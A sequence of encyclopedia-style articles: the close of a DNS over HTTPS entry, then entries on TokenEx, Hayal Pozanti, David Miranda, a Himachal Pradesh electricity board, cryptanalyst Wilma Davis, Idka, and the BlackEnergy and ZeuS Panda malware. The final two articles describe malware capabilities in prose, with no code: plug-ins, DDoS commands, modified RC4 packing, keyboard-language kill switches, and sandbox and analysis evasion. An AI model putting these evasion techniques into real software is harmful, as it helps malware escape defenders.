In contrast to the previously mentioned method, the proxy needs to be installed on each system wishing to use DoH, which might require a lot of effort in larger environments. Software support Operating systems Apple Apple's iOS 14 and macOS 11, released in late 2020, support both the DoH and DoT protocols. Windows In November 2019, Microsoft announced plans to implement support for encrypted DNS protocols in Microsoft Windows, beginning with DoH. In May 2020, Microsoft released Windows 10 Insider Preview Build 19628, which included initial support for DoH along with instructions on how to enable it via the registry and command-line interface. Windows 10 Insider Preview Build 20185 added a graphical user interface for specifying a DoH resolver. DoH support is not included in Windows 10 21H2. Windows 11 has DoH support. Recursive DNS resolvers BIND BIND 9, an open source DNS resolver from Internet Systems Consortium, added native support for DoH in version 9.17.10. PowerDNS DNSdist, an open source DNS proxy/load balancer from PowerDNS, added native support for DoH in version 1.4.0 in April 2019. Unbound Unbound, an open source DNS resolver created by NLnet Labs, has supported DoH since version 1.12.0, released in October 2020. It first implemented support for DNS encryption using the alternative DoT protocol much earlier, starting with version 1.4.14, released in December 2011. Unbound runs on most operating systems, including distributions of Linux, macOS, and Windows. Web browsers Google Chrome DNS over HTTPS is available in Google Chrome 83 for Windows and macOS, configurable via the settings page. When enabled, and the operating system is configured with a supported DNS server, Chrome will upgrade DNS queries to be encrypted. It is also possible to manually specify a preset or custom DoH server to use within the user interface. In September 2020, Google Chrome for Android began a staged rollout of DNS over HTTPS.
Users can configure a custom resolver or disable DNS over HTTPS in settings. Microsoft Edge Microsoft Edge supports DNS over HTTPS, configurable via the settings page. When enabled, and the operating system is configured with a supported DNS server, Edge will upgrade DNS queries to be encrypted. It is also possible to manually specify a preset or custom DoH server to use within the user interface. Mozilla Firefox In 2018, Mozilla partnered with Cloudflare to deliver DoH for Firefox users that enable it (known as Trusted Recursive Resolver). On February 25, 2020, Firefox started enabling DNS over HTTPS for all US-based users, relying on Cloudflare's resolver by default. Opera Opera supports DoH, configurable via the browser settings page. By default, DNS queries are sent to Cloudflare servers. Public DNS servers DNS over HTTPS server implementations are already available free of charge from some public DNS providers. Implementation considerations Many issues with how to properly deploy DoH are still being resolved by the internet community, including, but not limited to: Stopping third parties from analyzing DNS traffic for security purposes Disruption of DNS-level parental controls and content filters Split DNS in enterprise networks CDN localization Analysis of DNS traffic for security purposes DoH can impede analysis and monitoring of DNS traffic for cybersecurity purposes; the 2019 DDoS worm Godlua used DoH to mask connections to its command-and-control server. In January 2021, the NSA warned enterprises against using external DoH resolvers because they prevent DNS query filtering, inspection, and audit. Instead, the NSA recommends configuring enterprise-owned DoH resolvers and blocking all known external DoH resolvers.
Disruption of content filters DoH has been used to bypass parental controls which operate at the (unencrypted) standard DNS level; Circle, a parental control router which relies on DNS queries to check domains against a blocklist, blocks DoH by default due to this. However, there are DNS providers that offer filtering and parental controls along with support for DoH by operating DoH servers. The Internet Service Providers Association (ISPA)—a trade association representing British ISPs—and the British body Internet Watch Foundation have criticized Mozilla, developer of the Firefox web browser, for supporting DoH, as they believe that it will undermine web blocking programs in the country, including ISP default filtering of adult content, and mandatory court-ordered filtering of copyright violations. The ISPA nominated Mozilla for its "Internet Villain" award for 2019 (alongside the EU Directive on Copyright in the Digital Single Market, and Donald Trump), "for their proposed approach to introduce DNS-over-HTTPS in such a way as to bypass UK filtering obligations and parental controls, undermining internet safety standards in the UK." Mozilla responded to the allegations by the ISPA, arguing that it would not prevent filtering, and that they were "surprised and disappointed that an industry association for ISPs decided to misrepresent an improvement to decades-old internet infrastructure". In response to the criticism, the ISPA apologized and withdrew the nomination. Mozilla subsequently stated that DoH will not be used by default in the British market until further discussion with relevant stakeholders, but stated that it "would offer real security benefits to UK citizens". Inconsistent DoH deployment Some DoH deployments are not end-to-end encrypted, but rather only hop-to-hop encrypted, because DoH is deployed only on a subset of connections.
The chain involves the following types of connections: from the client device (a computer or tablet) to the local DNS forwarder (home or office router); from the DNS forwarder to the recursive DNS resolver (typically at the ISP); from the recursive DNS resolver to the authoritative DNS resolver (usually located in a data center). Every connection in the chain needs to support DoH for maximum security. See also DNS over TLS DNSCrypt DNSCurve EDNS Client Subnet References External links DNS Privacy Project: dnsprivacy.org DNS over HTTPS Implementations A cartoon intro to DNS over HTTPS DNS over HTTPS (DoH) Considerations for Operator Networks (draft, expired on 12 March 2020) Application layer protocols Web security exploits Domain Name System Internet protocols
56918452
https://en.wikipedia.org/wiki/TokenEx
TokenEx
TokenEx is a cloud-based data security company headquartered in Tulsa, Oklahoma. The company was founded in 2010 by Alex Pezold. It provides solutions that couple tokenization (data security), encryption, and key management to secure sensitive data, and specializes in the tokenization of sensitive customer data. Pezold said tokenization can translate "30 million credit card numbers into 30 million tokens" in a very short time. World Vision International is one of the clients using the TokenEx platform. On 28 February 2018, the company announced a partnership with Cloud Constellation to design a space-based data security solution that layers tokenization and secure storage in space for securing customers' sensitive data. It won the 2016 Metro 50 Award and was recognized as the Metro 50's fastest-growing privately held company by the Greater Oklahoma City Chamber. See also Oklahoma Center for the Advancement of Science and Technology RSA Security References Computer security companies Software companies based in Oklahoma Software companies established in 2010 Former certificate authorities 2010 establishments in Oklahoma Security companies of the United States Software companies of the United States
56922165
https://en.wikipedia.org/wiki/Hayal%20Pozanti
Hayal Pozanti
Hayal Pozanti (born 1983, Istanbul, Turkey) is a Turkish-born artist based in the United States. She is known for her large-scale, brightly colored, seemingly abstract and geometric paintings that represent statistical data related to human-computer interaction. Life and work Hayal Pozanti studied visual arts and visual communication design at Sabancı University in Istanbul and went on to study at Yale University, receiving an M.F.A. in painting and printmaking in 2011. Her work is informed by her ongoing exploration of "cyborg anthropology", which she describes as "a framework for understanding the effects of technology on human beings and culture". Her work Ciphers (2015) was a direct rendering of data into a glyph alphabet, limiting herself to the creation of 31 characters. The paintings from Ciphers (2015) feature layered abstractions of the shapes, and were displayed in the gallery with abstract sculptures of similar shapes. Pozanti revisited this theme of alphabet in her work Instant Paradise (2017), where she again invented an alphabet of 31 shapes. This lexicon is the source material for her paintings, sculptures, animations and sound pieces. Each shape in Instant Paradise has been assigned a number and a letter from the English alphabet, allowing her to literally 'translate' information through a personalized encryption system. She has created a typeface from her characters, as well as phonemes that she uses for her animations and her sound pieces, respectively. Pozanti's work is in several public collections, including the Los Angeles County Museum of Art (LACMA), the Eli and Edythe Broad Art Museum, JP Morgan, Fidelity Investments, and the San Jose Museum of Art.
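The shape-to-letter assignment described above amounts to a simple substitution scheme. As a minimal sketch (the shape names and the mapping here are hypothetical stand-ins; Pozanti's actual 31-character lexicon and its assignments are her own invention), such a one-to-one assignment can be modeled as:

```python
import string

# Hypothetical stand-ins for invented glyphs: one "shape" per letter.
SHAPES = [f"shape_{i:02d}" for i in range(26)]
ENCODE = dict(zip(string.ascii_lowercase, SHAPES))
DECODE = {shape: letter for letter, shape in ENCODE.items()}

def to_glyphs(text):
    # Letters map to glyphs; anything outside the lexicon is dropped.
    return [ENCODE[ch] for ch in text.lower() if ch in ENCODE]

def from_glyphs(glyphs):
    return "".join(DECODE[g] for g in glyphs)

assert from_glyphs(to_glyphs("Instant Paradise")) == "instantparadise"
```

Because each glyph corresponds to exactly one letter, the mapping is invertible, which is what allows text to be 'translated' into glyphs and back.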
Exhibitions Solo exhibitions 2018 – Murmurs of Earth, Jessica Silverman Gallery, San Francisco, California 2017 – .tr, Dirimart, Istanbul, Turkey 2016 – Fuzzy Logic, Rachel Uffner Gallery, New York City, New York 2016 – Corpus, Levy.Delval, Brussels, Belgium 2015 – Deep Learning, Aldrich Contemporary Art Museum, Ridgefield, Connecticut 2015 – Scrambler, Halsey Mckay Gallery, East Hampton, New York 2015 – Ciphers, Jessica Silverman Gallery, San Francisco, California 2013 – Passwords, Duve, Berlin, Germany 2013 – New Paintings, Susanne Vielmetter Los Angeles Projects, Los Angeles, California 2012 – Co-Real, Jessica Silverman Gallery, San Francisco California Group exhibitions Pozanti's work has been featured in group exhibitions at Public Art Fund, Brooklyn Academy of Music, The Kitchen, MCA Santa Barbara, Cornell Fine Arts Museum, and the Sabanci Museum, Istanbul. References 1983 births Living people 21st-century Turkish women artists Artists from Istanbul Turkish women painters Yale University alumni
56929217
https://en.wikipedia.org/wiki/David%20Miranda%20%28politician%29
David Miranda (politician)
David Michael dos Santos Miranda (born 10 May 1985) is a Brazilian politician. He is a Federal Congressman representing the state of Rio de Janeiro, sworn in on 1 February 2019, and affiliated to the Democratic Labour Party (PDT), after switching parties from the Socialism and Liberty Party (PSOL) in 2022. Prior to that, he was a City Councilman representing the city of Rio de Janeiro. In 2019, Miranda was named by Time magazine as one of the world's next generation of new leaders. Activism and political work Miranda led the campaign for the Brazilian government to grant political asylum to Edward Snowden and worked with his husband, American journalist Glenn Greenwald to publish the revelations contained in Snowden's leaks detailing mass surveillance by the National Security Agency (NSA). He met with Luciana Genro, the PSOL candidate for the 2014 Brazilian presidential election, and obtained her commitment to extend asylum to Snowden if elected. Numerous public Brazilian figures supported the campaign, which failed to convince the government of Dilma Rousseff. In August 2013, Miranda was detained over his work on the NSA program for nine hours by the British government at London's Heathrow Airport under Schedule 7 of the Terrorism Act 2000, after he had flown in from Berlin and was changing to a plane bound for home, in Rio de Janeiro. His belongings were seized, including an external hard drive which, according to Greenwald, contained sensitive documents relevant to Greenwald's reporting, and which was encrypted with TrueCrypt encryption software. Greenwald described his partner's detention as "clearly intended to send a message of intimidation to those of us who have been reporting on the NSA and GCHQ". Miranda described his treatment by the UK authorities as "psychological torture". In 2014, Miranda interviewed Jair Bolsonaro for an article by Greenwald in The Intercept. At the time, Bolsonaro was a former army captain and a little known representative. 
In 2016, Miranda and his friend Marielle Franco were elected as the first LGBT councillors in Rio's history. Miranda focuses primarily on the issues of the LGBT community and other marginalized segments of the Rio population. Miranda and his family have travelled in a bulletproof car since Franco was assassinated in March 2018. In 2018, Miranda was elected as a substitute for PSOL deputy Jean Wyllys. When Wyllys, who is also LGBT, announced in January 2019 that he had left the country due to death threats, Miranda, who was also a PSOL member, took Wyllys' place in the Chamber of Deputies. After taking his seat, Miranda began to receive "hundreds" of death threats. Joice Hasselmann, a representative of the now-President Bolsonaro's party, accused Miranda of buying his seat. Due to the intimidation from Hasselmann and Bolsonaro supporters during the Vaza Jato reporting Greenwald was engaged in, Miranda disclosed that he had begun taking anti-depressants and that he and Greenwald rarely leave their home, and then only with hired bodyguards. On January 22, 2022, Miranda announced he was leaving the PSOL and joining the Democratic Labour Party (PDT) and endorsing its leader Ciro Gomes in the 2022 Brazilian general election. Personal life Miranda was raised in Jacarezinho, Rio de Janeiro. His mother died when he was five, and he moved in with an aunt. He left home when he was 13, dropped out of school, and worked in menial jobs for the next six years. He was playing volleyball on Ipanema beach in February 2005 when he knocked over the drink of Glenn Greenwald. The couple moved in together within a week. Soon after they first met, Greenwald encouraged Miranda's return to education and he graduated from Escola Superior de Propaganda e Marketing (ESPM) in 2014. Both Greenwald and Miranda are openly gay, and are married. In 2017, the couple adopted two children who are siblings.
Controversies On 11 September 2019, O Globo newspaper reported that an investigation by a division of the Brazilian Ministry of the Economy identified R$2.5 million in suspicious transactions in Miranda's personal bank account during a one year period from 2018 to 2019, including deposits from current and former employees. As a result, the Public Ministry opened an investigation into his finances. According to media reports, investigators suspect Miranda of "concealing the origin" of the funds and participating in an illegal practice known as "", in which public servants employed in the offices of elected officials kick back a portion of their salary to their boss. Jair Bolsonaro's sons, Flavio Bolsonaro and Carlos Bolsonaro, are also under investigation for this practice. Glenn Greenwald accused the Brazilian Public Ministry, which represents prosecutors, of launching the investigation and leaking it for political reasons, due to his involvement in uncovering corruption and political bias among Brazilian prosecutors and judges involved in the Lava Jato operation. 2018 center-left presidential candidate Ciro Gomes and center-right pundit Reinaldo Azevedo both described the investigation against Miranda as borne out of a spirit of police state and political persecution. A few days afterwards, Miranda and Greenwald opened their bank accounts for public access, and challenged the Bolsonaro family to follow suit. References External links Official website (in Portuguese) 1985 births Living people Afro-Brazilian people Brazilian politicians of African descent LGBT Afro-Brazilians Gay politicians LGBT journalists from Brazil LGBT politicians from Brazil Socialism and Liberty Party politicians Members of the Chamber of Deputies (Brazil) from Rio de Janeiro (state) Municipal Chamber of Rio de Janeiro councillors LGBT legislators 21st-century LGBT people
56946727
https://en.wikipedia.org/wiki/Himachal%20Pradesh%20State%20Electricity%20Board
Himachal Pradesh State Electricity Board
Himachal Pradesh State Electricity Board Limited (HPSEBL) is a state government undertaking electricity board operating within the state of Himachal Pradesh, India, that generates and supplies power through a network of transmission, sub-transmission, and distribution lines. The Himachal Pradesh State Electricity Board was constituted on 1 September 1971 in accordance with the provisions of the Electricity Supply Act, 1948, and was reorganized as Himachal Pradesh State Electricity Board Limited in 2010 under the Companies Act, 1956. Restructuring The Himachal Pradesh State Electricity Board was re-organized as Himachal Pradesh State Electricity Board Ltd. with effect from 14 June 2010 under the Companies Act, 1956. Functions HPSEBL is responsible for the supply of uninterrupted, quality power to all consumers in Himachal Pradesh. Power is supplied through a network of transmission, sub-transmission and distribution lines laid across the state. Since its inception, the Board has made long strides in executing the targets entrusted to it. Himachal Pradesh Area Load Despatch Centre (HPALDC) The Himachal Pradesh Area Load Despatch Centre has been established to ensure integrated operation of the power system of HPSEBL with the Northern Region Load Despatch Centre of India: to monitor system parameters and security; to conduct system studies, planning and contingency analysis; to analyse trippings and facilitate remedial measures; to carry out daily scheduling and operational planning; to facilitate bilateral exchanges; to compute energy dispatch and drawal values using SEMs; and to augment telemetry, computing and communication facilities. Generation Notable Achievements Himachal Pradesh achieved 100 percent electrification of all its census villages in the year 1988. Ensured 24 x 7 uninterrupted power supply. Himachal Pradesh has the honor of providing electricity at the lowest tariff in the country. Himachal Pradesh achieved the unique distinction of 100% metering, billing and collection.
Achieved the highest household/consumer coverage ratio in the country, about 98% as per REC's survey, and has been adjudged one of the best boards in the country.
Installed and commissioned the power house at the highest altitude in the world (Rongtong Power House, at an altitude of approximately 12,000 ft).
Installed and commissioned a totally underground power house, which is unique in Asia (Bhaba Power House – 120 MW).
Introduced hassle-free online utility bill payment systems.
Started 128-bit SSL encryption for secure e-commerce systems.
Ensured safe and timely energy bill payments using credit/debit cards or net banking.

References

External links
Official website: http://portal.hpseb.in/irj/go/km/docs/internet/New_Website/Pages/Home.html
Electricity Supply Act (1948)
Indian Electricity Act

State agencies of Himachal Pradesh
Energy in Himachal Pradesh
State electricity agencies of India
Energy companies established in 1971
1971 establishments in Himachal Pradesh
56952863
https://en.wikipedia.org/wiki/Wilma%20Z.%20Davis
Wilma Z. Davis
Wilma Zimmerman Davis (31 March 1912 – 10 December 2001) was an early American codebreaker. She was a leading national cryptanalyst before and during World War II and the Vietnam War. She graduated with a degree in mathematics from Bethany College and successfully completed Navy correspondence courses in cryptology. She began her career as a cryptanalyst, which would span over 30 years, in the 1930s in the United States Army Signal Intelligence Service (SIS), a predecessor of the National Security Agency (NSA). She was hired by William Friedman, a US Army cryptographer who led the research division of the Army's Signal Intelligence Service in the 1930s. Davis worked as a cryptanalyst on the Italian, Japanese, Chinese, Vietnamese, and Russian problems. She also worked on the VENONA project.

Early life and education
She grew up in Beech Bottom, West Virginia, a steel town of about 400 people with a church, a pool room, a drug store, and a company store. She had three siblings, and her father worked for a steel company. She went to high school in Wellsburg, West Virginia, graduating in 1928. Wilma attended Bethany College, a small college of about three hundred and fifty students at the time, and graduated with a degree in mathematics in 1932. She was so actively involved in college that she sometimes could not make it home for Christmas. Her father gave her only a thousand dollars as she left college, because that was all he could afford to give her. Her mother died a few months before she graduated.

Career
After graduating from college, Wilma was meant to teach high school, but she ended up teaching first graders due to a lack of jobs for high school teachers. After a year, she took a job in her hometown as a math teacher, where she worked for four years and made about ninety dollars a month.
Since teachers only worked nine months of the year, she made about eight hundred and ten dollars a year. Because of her mother's death, Wilma was responsible for keeping the house while her siblings were in high school. Thereafter, she worked in a payroll office and later as a code clerk at the unemployment census. Wilma Davis' interest in cryptology was piqued after reading in the Washington Star about William and Elizebeth Friedman, the American codebreakers. Her brother-in-law, a civil servant, enrolled her in Navy correspondence courses in cryptology; Davis relished the courses and excelled in them. She decided to sit for the Civil Service exam and got on the civil service register. She worked at the National Bureau of Aeronautics for about nine months before receiving her civil service status. She then worked at the Civil Service Commission as a junior civil service examiner, and it was from there that William Friedman gave her her first job as a cryptanalyst, in 1937 or 1938. The Signal Intelligence Service was expanding at the time, and Friedman was looking to recruit. Friedman offered Wilma $1,620 a year while she was making about $1,440. She had to put her name on a sign-up sheet, and she was 19th on the list. Wilma was ecstatic about the opportunity, all the more because William Friedman and his wife had been the major driving force behind her interest in cryptology. In March 1941, she was first assigned to work with Dr. Abe Sinkov on breaking the Italian diplomatic codes. The Italians used their own encryption machines, improvements on the German Enigma machine, to transmit high-level military secrets, mainly to diplomats and military officials in Berlin, Washington, and London, so as to avoid interception by other nations.
The Italian intercepts came from Western Union, and the British were instrumental in breaking the Italian code. Wilma and her colleagues worked on the Italian problem while taking cryptology courses. They were responsible for getting the messages, organizing them, recording them, filing them, and deciphering them. In July 1942, she was assigned to "Department A", which was responsible for working on coded messages from the Japanese Army; William Friedman had initially worked on breaking the Japanese codes. Within two years of working in Department A, she was put in charge of the unit whose duty was to analyze and interpret the addresses linked to the messages of the Japanese military. One of the main goals of deciphering the Japanese messages was to work out the Japanese order of battle. Wilma worked alongside Ann Caracristi, later the first female deputy director of the NSA, to break the Japanese codes. Wilma was revered for her deep knowledge, her ability to prioritize assignments and onboard new team members, and her unwavering dedication to her work. Her team's success on the Japanese problem allowed the US to gain an upper hand on the Japanese. The Japanese machine was one of the most sophisticated cipher machines of its era, and breaking it gave the US access to top-level Japanese messages during World War II. In an NSA interview, she recalled working on the Japanese problem as one of the highest points of her cryptology career. At the end of the war, she was asked to move to the Chinese team, which was led by Dr. Leslie Rutledge, an NSA scholar. The request was made by Frank Rowlett, chief of the Intelligence Division from 1945 to 1947. Rowlett put Wilma in a difficult position by asking her to take charge of the Chinese project and report back to him, essentially asking her to run the project without regard for Leslie Rutledge, its head. This left Wilma conflicted, as it went against her convictions.
It bothered Wilma so much that she became physically sick and went to see her doctor, who said she was on the verge of a nervous breakdown. She eventually voiced her concerns to Rowlett, and he found someone else to take charge, which was a great relief to her. Wilma indicated that she had no ill feelings toward Dr. Leslie Rutledge, and the two later worked together on starting the missile problem. After working with the Chinese team, she moved to the VENONA project, trying to break Soviet messages; the information obtained from VENONA proved instrumental in uncovering Soviet activities during the Cold War. Wilma Davis worked on the VENONA project until 1949, then married her second husband, John Mason, and moved with him to Canada. After Mason's death in 1952, she received a telegram from William Friedman asking her to return to work in Washington, D.C. Wilma was put in charge of the Russian diplomatic problem and was then reassigned to the VENONA project. Wilma left her cryptology work again after marrying her third husband, John Davis, and later took up the position of assistant director of production. Wilma remained an avid supporter of John Davis in all his roles, which contributed to his accomplishments. Wilma Davis left the cryptologic field a few times during her career, but she could not stay away: she returned to work on VENONA, and returned a second time during the Vietnam War. She finally retired in 1973, concluding her career as a pioneering cryptanalyst as the senior executive of the Cryptanalytic Career Panel. In the years following her retirement, Wilma Davis lived in Fairfax, Virginia.

Family life
During her early years as a cryptanalyst, she was known as Wilma Berryman. Wilma was married and widowed three times. She met her first husband, John Berryman, at Bethany College.
They were classmates, and they moved to Washington, D.C. in the 1930s, where John Berryman worked at the general accounting office. He died six months after Wilma began working for the Signal Intelligence Service. In the fall of 1949, she married her second husband, John Mason, a major in the British Army, and relocated with him to Canada. Mason died suddenly in the summer of 1952 while visiting her sister, Helen, in Erie, Pennsylvania. Wilma returned to the US to continue her work as a cryptanalyst and married her third husband, John Davis, a brigadier general.

Legacy and death
Wilma Davis is featured as one of 18 leading women in cryptology by the National Cryptologic Museum Foundation, and she is recognized as an honoree of the Women in American Cryptology by the National Security Agency (NSA). An article in the Phoenician describes her as "one of the Founding Mothers of cryptology", and Benson K. Buffham described her as one of the most gifted cryptanalysts of Arlington Hall. Wilma Davis died on December 10, 2001, at the age of 89, and is buried beside her third husband, John Davis, at Arlington National Cemetery, Fort Myer, Arlington, Virginia.

References

American cryptographers
1912 births
2001 deaths
56977631
https://en.wikipedia.org/wiki/Idka
Idka
Idka AB is a collaborative platform headquartered in Sweden. Idka allows users to connect, communicate, and store and share documents and files while keeping their data private. Idka is advertising-free and fully encrypted. The service combines the core functionality of social media in one place and, according to the company, never shares or sells user information; the user controls all sharing. Idka is available as an HTML5 web service and requires no IT knowledge or support, and no installation of any kind except for apps on iOS and Android.

Background
Idka was founded on the belief that the advertising-driven model cannot be fixed, contrary to what Facebook and others have claimed. Idka presents itself as the antithesis of the "stalker economy" underlying today's social networking, where the users themselves are the product. In the company's view, the built-in incentives of the advertising model inevitably lead to serious privacy violations and, beyond that, create a problem for a free, democratic way of life. The problems of tailored news (echo chambers), dark posts, political "nudging", covert political campaigning, profiling, and surveillance are real and have already had a discernible impact.

Description
Idka was created as a product in its own right: users pay a small monthly subscription for a service with short, understandable, and fair user terms. The service is free of advertising, news streams, and manipulation. Idka centers on privacy and security, so encryption and two-factor authentication are central. All default actions are set up to protect the user's privacy. There is no pre-population or prompting to invite or collect friends and contacts. A post is not shared on publication without a deliberate, specific share action from the user. A private post cannot be changed and shared with new people. People who are added to a many-to-many chat can only see chat entries made after they were added.
A picture in a post cannot be downloaded, and it disappears if removed by the person who uploaded it. Delete really means delete: the information is removed from Idka's servers. The service covers a number of functions that are otherwise spread across several platforms, such as posting, chat with end-to-end encryption (like Telegram and Signal), many-to-many chat (like Google Hangouts), and integrated drag-and-drop cloud storage (like Box and Dropbox) without file size limits. When a group is created, it immediately has its own cloud storage, its own chat, and its own posting wall. Members can be read-only if necessary. The service also caters to companies with "organizational accounts" and provides more functionality than comparable web services (such as Slack).

References

External links

Companies based in Stockholm
Online companies of Sweden
Multilingual websites
Proprietary cross-platform software
Real-time web
Swedish social networking websites
Text messaging
57064057
https://en.wikipedia.org/wiki/BlackEnergy
BlackEnergy
BlackEnergy malware was first reported in 2007 as an HTTP-based toolkit that generated bots to execute distributed denial-of-service (DDoS) attacks. In 2010, BlackEnergy 2 emerged with capabilities beyond DDoS. In 2014, BlackEnergy 3 came equipped with a variety of plug-ins. A Russia-based group known as Sandworm (aka Voodoo Bear) is attributed with using BlackEnergy in targeted attacks. The attack is distributed via a Word document or PowerPoint attachment in an email, luring victims into opening the seemingly legitimate file.

BlackEnergy 1 (BE1)
BlackEnergy's code facilitates different attack types to infect target machines. It is also equipped with server-side scripts which the perpetrators can develop on the command and control (C&C) server. Cybercriminals use the BlackEnergy bot-builder toolkit to generate customized bot client executable files that are then distributed to targets via email spam and phishing campaigns. BE1 lacks exploit functionality and relies on external tools to load the bot. BlackEnergy can be detected using the YARA signatures provided by the United States Department of Homeland Security (DHS).

Key features
• can target more than one IP address per hostname
• has a runtime encrypter to evade detection by antivirus software
• hides its processes in a system driver (syssrv.sys)

Command types
• DDoS attack commands (e.g. ICMP flood, TCP SYN flood, UDP flood, HTTP GET flood, DNS flood, etc.)
• download commands to retrieve and launch new or updated executables from its server
• control commands (e.g. stop, wait, or die)

BlackEnergy 2 (BE2)
BlackEnergy 2 uses sophisticated rootkit/process-injection techniques, robust encryption, and a modular architecture built around a "dropper". The dropper decrypts and decompresses the rootkit driver binary and installs it on the victim machine as a service with a randomly generated name.
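The dropper's decryption step can be illustrated with a plain RC4 routine. This is a sketch for illustration only: BlackEnergy 2 is reported to use a modified RC4 variant (the modification is in the key scheduling and is not reproduced here), and the key and data below are placeholders, not values from the malware.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA) -- the step BlackEnergy 2 reportedly modifies.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA); RC4 is symmetric, so the
    # same routine both encrypts and decrypts.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

# A placeholder 128-bit (16-byte) hard-coded key, as described for embedded content.
KEY = bytes(range(16))
blob = rc4(KEY, b"embedded rootkit driver")     # "encrypt" the embedded content
assert rc4(KEY, blob) == b"embedded rootkit driver"  # the same call decrypts it
```

Decrypting network traffic, as described below, would use the same routine with the bot's unique identification string as the key.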
As an update to BlackEnergy 1, it combines older rootkit source code with new functions for unpacking and injecting modules into user processes. Packed content is compressed using the LZ77 algorithm and encrypted using a modified version of the RC4 cipher. A hard-coded 128-bit key decrypts embedded content. For decrypting network traffic, the cipher uses the bot's unique identification string as the key. A second variation of the encryption/compression scheme adds an initialization vector to the modified RC4 cipher for additional protection in the dropper and rootkit unpacking stub, but it is used neither in the inner rootkit nor in the userspace modules. The primary modification in the RC4 implementation in BlackEnergy 2 lies in the key-scheduling algorithm.

Capabilities
• can execute local files
• can download and execute remote files
• updates itself and its plug-ins via command and control servers
• can execute die or destroy commands

BlackEnergy 3 (BE3)
The latest full version of BlackEnergy emerged in 2014. Its changes simplified the malware code: this version's installer drops the main dynamically linked library (DLL) component directly into the local application data folder. This variant of the malware was involved in the December 2015 Ukraine power grid cyberattack.

Plug-ins
• fs.dll — file system operations
• si.dll — system information, "BlackEnergy Lite"
• jn.dll — parasitic infector
• ki.dll — keystroke logging
• ps.dll — password stealer
• ss.dll — screenshots
• vs.dll — network discovery, remote execution
• tv.dll — Team Viewer
• rd.dll — simple pseudo "remote desktop"
• up.dll — update malware
• dc.dll — list Windows accounts
• bs.dll — query system hardware, BIOS, and Windows info
• dstr.dll — destroy system
• scan.dll — network scan

References

Malware toolkits
Windows trojans
Cyberattacks on energy sector
57069851
https://en.wikipedia.org/wiki/ZeuS%20Panda
ZeuS Panda
ZeuS Panda, Panda Banker, or Panda is a variant of the original Zeus trojan in the banking trojan category. It was discovered in 2016 in Brazil, around the time of the Olympic Games. The majority of its code is derived from the original Zeus trojan, and it retains the code to carry out man-in-the-browser, keystroke logging, and form grabbing attacks. ZeuS Panda launches attack campaigns with a variety of exploit kits and loaders, by way of drive-by downloads and phishing emails, and also by hooking internet search results to infected pages. Its stealth capabilities make the malware difficult not only to detect but also to analyze.

Capabilities
ZeuS Panda utilizes numerous loaders such as Emotet, Smoke Loader, Godzilla, and Hancitor. The loaders' methods vary, but the end goal of installing ZeuS Panda on a system is the same. Many of the loaders were originally trojans before being retooled as delivery systems for ZeuS Panda. Delivery is not necessarily limited to these loaders, as exploit kits such as Angler, Nuclear, Neutrino, and Sundown are also utilized. Coders of the ZeuS Panda banking trojan, like other trojan coders, lean toward employing loaders over exploit kits due to the higher potential monetary yield. The loaders also make ZeuS Panda persistent across reboots and even deletion: if ZeuS Panda is no longer detected on a system but the loader is still present, the loader re-downloads the malicious code and starts it running all over again. One of the key distinctions of ZeuS Panda over other banking trojans is its ability to target systems in specific regions of the world. It does this through a rudimentary check of the Human Interface Device code of the attached keyboard: if a keyboard code for Russia (0x419), Belarus (0x423), Kazakhstan (0x43f), or Ukraine (0x422) is detected, ZeuS Panda deletes itself.
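The self-deletion check described above can be sketched as follows. This is a minimal illustration: the function name is invented, and a real sample would read installed layouts through the Windows API rather than receiving them as a list.

```python
# Keyboard-layout language identifiers named in the article.
EXCLUDED_LAYOUTS = {
    0x419,  # Russian
    0x423,  # Belarusian
    0x43F,  # Kazakh
    0x422,  # Ukrainian
}

def should_self_delete(installed_layouts) -> bool:
    """True if any installed layout's language ID is on the exclusion list.

    The low 16 bits of a Windows HKL handle hold the language identifier,
    hence the 0xFFFF mask.
    """
    return any(hkl & 0xFFFF in EXCLUDED_LAYOUTS for hkl in installed_layouts)

# A machine with only a US-English layout (0x409) is a valid target;
# one that also has a Russian layout (0x419) triggers self-deletion.
assert not should_self_delete([0x4090409])
assert should_self_delete([0x4090409, 0x4190419])
```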
This falls in line with the unwritten rules Russian cybercriminals abide by to avoid arrest: first, "Russians must not hack Russians"; second, "If a Russian intelligence service asks for help, you provide it"; and last, "Watch where you vacation". ZeuS Panda employs many methods of infection, namely drive-by downloads, poisoned email, and Word document macros. Drive-by downloads are "downloads which a person has authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet) automatically", including "any download that happens without a person's knowledge, often a computer virus, spyware, malware, or crimeware." Email poisoning occurs when a mailing list is injected with a number of invalid e-mail addresses; the resources required to send a message to the list increase even though the number of valid recipients has not. Command and control servers are how ZeuS Panda is able to spread across the vastness of the world while remaining under the control of a handful of operators.

Area of interest
First discovered in 2016 prior to the Olympics in Brazil, ZeuS Panda has spread to all parts of the globe in similar fashion to the original Zeus banking trojan, with similar regional concentrations of infection. Locations of the infected domains by region and concentration are similar to the original Zeus infection locations. Though there are still locations within Russia listed as infected, these are likely standalone servers distributing the banking trojan. Countries targeted more than others are likely chosen based on GDP. Some regions do not have as many reported infections, likely because they lack sufficient GDP to be a worthwhile target, belong to the protected areas which Russian cybercriminals do not attack, or simply under-report due to a lack of personnel and antivirus coverage in the region.
Stealth capabilities
ZeuS Panda is able to detect and counter many forensic analysis tools and sandbox environments. There are at least 23 known tools it can detect; if any of them are found on the system, ZeuS Panda stops installation and removes itself. Adding the "-f" command-line parameter at the start of the malware disables this security feature, raising the infection rate at the risk of detection. Aside from its anti-detection capabilities, it also has anti-analysis protocols, should the "-f" option be used or a program not on the trojan's watchlist detect it. It does so by inspecting files, mutexes, running processes, and registry keys. Once the anti-detection and anti-analysis checks are passed, ZeuS Panda embeds itself deeply into the system registry. It looks for empty folders with a long subfolder chain without the names Microsoft or Firefox in the tree. Encrypting its data adds to the difficulty of detection by cyber forensics: the configuration settings are encrypted with RC4 and AES, and the malware is also known to use cryptographic hash functions employing the SHA-256 and SHA-1 algorithms.

Detection
